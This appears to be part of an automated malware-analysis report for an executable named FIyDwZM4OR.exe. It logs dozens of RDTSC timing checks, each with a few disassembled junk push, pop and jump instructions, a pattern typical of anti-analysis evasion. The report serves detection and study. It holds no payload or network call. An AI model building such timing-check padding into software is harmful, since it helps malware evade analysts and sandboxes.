Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769231 second address: 176923E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEA75199F66h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17693C2 second address: 17693E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEA75194B46h 0x0000000a jmp 00007FEA75194B4Dh 0x0000000f popad 0x00000010 pop ecx 0x00000011 pushad 0x00000012 push edi 0x00000013 jnp 00007FEA75194B46h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17693E8 second address: 1769400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1769400 second address: 176940B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 176940B second address: 1769421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA75199F66h 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007FEA75199F66h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771F9A second address: 1771FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FEA75194B46h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FAA second address: 1771FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FB0 second address: 1771FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FEA75194B46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FC0 second address: 1771FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1771FE1 second address: 1771FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177230E second address: 1772312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177245E second address: 1772462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1772462 second address: 1772485 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA75199F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75199F6Eh 0x00000014 jbe 00007FEA75199F66h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1772485 second address: 1772489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1772489 second address: 177248F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177248F second address: 1772494 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1773330 second address: 1773344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FEA75199F66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1773344 second address: 1773349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177ADB1 second address: 177ADCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FEA75199F6Bh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f jns 00007FEA75199F66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1778F6C second address: 1778F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17790A9 second address: 17790C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F74h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17790C5 second address: 17790CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177940D second address: 1779413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779413 second address: 1779419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D0B second address: 1779D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEA75199F66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D1A second address: 1779D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D1E second address: 1779D24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1779D24 second address: 1779D29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177A83E second address: 177A848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEA75199F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 177AB13 second address: 177AB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FEA75194B4Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843C8 second address: 17843CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843CE second address: 17843D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843D6 second address: 17843EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 je 00007FEA75199F6Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17843EB second address: 17843EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783B9C second address: 1783BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783BA4 second address: 1783BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jne 00007FEA75194B54h 0x0000000d jmp 00007FEA75194B54h 0x00000012 jmp 00007FEA75194B52h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D45 second address: 1783D62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Fh 0x00000007 jng 00007FEA75199F66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D62 second address: 1783D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D66 second address: 1783D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D6A second address: 1783D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FEA75194B4Ah 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783D7F second address: 1783D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Ch 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1783F51 second address: 1783F5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FEA75194B46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178B6CE second address: 178B6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178B6D4 second address: 178B6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B59h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178B881 second address: 178B8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F77h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178BBAB second address: 178BBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178BEE5 second address: 178BEFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178BEFA second address: 178BEFF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178C5A7 second address: 178C5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178C5AD second address: 178C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 178C5B1 second address: 178C5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1792DB9 second address: 1792DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA75194B48h 0x0000000a popad 0x0000000b jnl 00007FEA75194B7Eh 0x00000011 pushad 0x00000012 jmp 00007FEA75194B57h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1792DE6 second address: 1792DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1793099 second address: 17930C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B4Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007FEA75194B54h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17930C5 second address: 17930D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75199F6Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A01D2 second address: 17A01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A01D8 second address: 17A01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FEA75199F66h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA75199F75h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A01FC second address: 17A0212 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b push ecx 0x0000000c js 00007FEA75194B4Eh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 16DFB55 second address: 16DFB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A38C6 second address: 17A38CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A38CE second address: 17A38E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jbe 00007FEA75199F66h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17A38E1 second address: 17A38E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B134B second address: 17B136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA75199F75h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B136A second address: 17B136E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B70E1 second address: 17B70FF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA75199F66h 0x00000008 jc 00007FEA75199F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FEA75199F6Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B70FF second address: 17B7104 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17B7104 second address: 17B710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BE900 second address: 17BE904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BE904 second address: 17BE914 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA75199F66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD2E7 second address: 17BD2FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007FEA75194B46h 0x00000009 jg 00007FEA75194B46h 0x0000000f pop edi 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD2FA second address: 17BD31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEA75199F78h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD31D second address: 17BD34A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B55h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEA75194B51h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD4CC second address: 17BD4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FEA75199F70h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD7C4 second address: 17BD7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD7C8 second address: 17BD7CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD7CE second address: 17BD7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD7D4 second address: 17BD7D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD7D8 second address: 17BD7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FEA75194B4Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BD93A second address: 17BD943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BDAEA second address: 17BDAEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BDAEE second address: 17BDAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BDAF8 second address: 17BDB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA75194B56h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17BDB12 second address: 17BDB2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17C1633 second address: 17C1665 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FEA75194B56h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007FEA75194B52h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17FDDDA second address: 17FDDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17FDC88 second address: 17FDCA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 17FDCA1 second address: 17FDCB6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEA75199F68h 0x00000008 pushad 0x00000009 jc 00007FEA75199F66h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18006AB second address: 18006B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEA75194B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18006B5 second address: 18006C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA75199F66h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 18006C5 second address: 1800726 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA75194B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007FEA75194B78h 0x00000013 jmp 00007FEA75194B59h 0x00000018 jmp 00007FEA75194B59h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FEA75194B58h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1800726 second address: 180072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 1808266 second address: 180827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEA75194B4Fh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 180827A second address: 1808280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
